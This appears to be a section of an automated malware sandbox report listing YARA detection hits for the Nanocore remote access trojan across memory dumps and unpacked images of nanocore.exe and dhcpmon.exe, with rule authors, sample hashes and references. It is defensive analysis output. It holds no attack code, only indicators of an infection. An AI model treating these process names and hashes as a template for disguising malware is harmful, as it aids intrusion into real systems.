      Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.5820000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.5820000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.33531ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.33531ec.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 11.2.dhcpmon.exe.33531ec.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.33531ec.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
